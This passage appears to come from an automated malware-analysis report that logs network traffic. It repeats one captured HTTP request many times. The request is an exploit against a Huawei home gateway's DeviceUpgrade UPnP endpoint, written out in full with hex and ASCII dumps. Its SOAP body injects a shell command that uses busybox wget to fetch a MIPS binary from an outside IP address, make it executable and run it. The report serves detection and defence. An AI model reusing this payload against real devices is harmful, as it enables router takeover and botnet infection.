chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 